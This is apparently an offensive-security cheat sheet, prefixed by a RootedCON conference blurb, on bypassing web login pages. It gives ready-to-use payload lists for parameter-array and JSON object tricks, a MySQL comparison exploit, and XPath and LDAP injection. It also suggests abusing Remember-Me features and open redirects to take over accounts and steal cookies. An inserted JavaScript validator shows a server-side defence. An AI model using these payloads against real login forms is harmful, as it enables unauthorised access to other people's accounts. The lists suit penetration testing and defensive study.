RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
If you find a login page, here you can find some techniques to try to bypass it:
user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b
Content-Type: application/json
password[password]=1
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND password=password=1;
which makes the password bit always true.
"password":{"password": 1} to bypass the login.
"stringifyObjects":true option when calling mysql.createConnection will eventually block all unexpected behaviours when Object is passed in the parameter.
Here you can find several tricks to bypass the login via SQL injections.
In the following page you can find a custom list to try to bypass login via SQL Injections:
Here you can find several tricks to bypass the login via No SQL Injections.
As NoSQL injections require changing the parameter values, you will need to test them manually.
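A server-side check for the parameter tricks at the top of this page (bracketed parameters such as user[]=a or password[password]=1, and a JSON object sent in place of the password), and for NoSQL injections where the changed value is an object instead of a string. This is an added example, not code from the original page; the field names username and password, the function names and the sample bodies are assumptions constructed for illustration.

```javascript
// Added example: field names and sample bodies are constructed for illustration.
const FIELDS = ["username", "password"];

// Parse a raw body by Content-Type into a Map of key -> value.
function parseBody(contentType, raw) {
  if (contentType.toLowerCase().startsWith("application/json")) {
    const doc = JSON.parse(raw); // throws on malformed JSON
    if (doc === null || typeof doc !== "object" || Array.isArray(doc)) {
      throw new Error("JSON body must be an object");
    }
    return new Map(Object.entries(doc));
  }
  // Form bodies: keep keys verbatim so bracket syntax stays visible.
  const fields = new Map();
  for (const [key, value] of new URLSearchParams(raw)) {
    if (fields.has(key)) throw new Error(`duplicate parameter: ${key}`);
    fields.set(key, value);
  }
  return fields;
}

// Accept a login body only if every credential is a plain, non-empty string.
function checkLogin(contentType, raw) {
  let body;
  try { body = parseBody(contentType, raw); }
  catch (err) { return { ok: false, reason: `unparseable body: ${err.message}` }; }
  for (const key of body.keys()) {
    // user[]=a or password[password]=1 turn into arrays/objects in parsers
    // that expand brackets, so reject them instead of guessing.
    if (/[\[\]]/.test(key)) return { ok: false, reason: `bracketed key: ${key}` };
  }
  for (const name of FIELDS) {
    const value = body.get(name);
    if (typeof value !== "string" || value.length === 0) {
      return { ok: false, reason: `${name} is not a non-empty string` };
    }
  }
  return { ok: true, reason: "" };
}

// Constructed sample requests: [Content-Type, body].
const SAMPLES = [
  ["application/x-www-form-urlencoded", "username=admin&password=hunter2"],
  ["application/x-www-form-urlencoded", "username=admin&password[password]=1"],
  ["application/json", '{"username":"admin","password":{"password":1}}'],
];
for (const [type, raw] of SAMPLES) console.log(raw, "=>", checkLogin(type, raw));
```

Run the check before the values reach the query layer, so that only strings are ever bound as credentials.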
Here you can find several tricks to bypass the login via XPath Injection.
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
Here you can find several tricks to bypass the login via LDAP Injection.
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
If the page has "Remember Me" functionality, check how it is implemented and see if you can abuse it to take over other accounts.
Pages usually redirect users after login; check if you can alter that redirect to cause an Open Redirect. Maybe you can steal some information (codes, cookies...) if you redirect the user to your website.
<input autocomplete="false"